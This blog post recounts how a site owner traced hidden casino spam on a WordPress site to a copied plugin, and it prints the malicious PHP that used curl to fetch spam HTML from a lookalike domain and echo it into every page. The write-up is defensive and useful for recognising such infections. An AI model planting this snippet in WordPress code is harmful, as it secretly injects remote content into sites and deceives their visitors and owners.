fighting wordpress spam in source of template

Today i realized that one of my websites had a hidden div with malicious code, mostly casino related scam. At first i believed that this wordpress spam had been injected somehow in the template files. Scanning all files and doing a recursive grep gave no results and sites like sukuri could not detect it.

The server itself is fairly secured, all requests go through a web application firewall and each site is running under its own linux user/processes. No hints of intrusion, and all other sites were running as expected. So how this could have happened..?

For starters, It looked like this:

<div id=”fb9735872″>

<p>Enjoy <a href=”{removed}” title=”Online Gambeling”>Online Gambeling</a> money odds. Casinos online wagering slot games with <a href=”{removed}” title=”Mobile Casino”>Mobile Casino</a> sports real ….

</div>

It also included a javascript command to hide the div. My first step was to disable all the enabled add-ons and reactivating them one by one while checking the source of my website. After a while i found an old plugin i copied from another website that when disabled caused the malicious div to disappear.

After i looked carefully at all its source files, i’ve found the malicious code near the end:

$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,”http://www.jqury.net/?1″);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch, CURLOPT_REFERER, $_SERVER[‘HTTP_HOST’]);

curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);

$jquery = curl_exec($ch);

curl_close($ch);

echo “$jquery”;

As you can see the planted code were retrieving all that casino spam from the url jqury.net.. It was almost invisible at first as it resembles jquery.net and actually redirects to it. But when its given the right parameter it spits out the html spam. Removing this solved the problem and everything went back to normal.

It turns out that all curl functions were disabled on my other site so i never encountered this until now. In conclusion never ever copy stuff even if you use them on other sites without closely reviewing their source. Always update and keep it as closely to stock as possible.

Print Friendly

You may also like...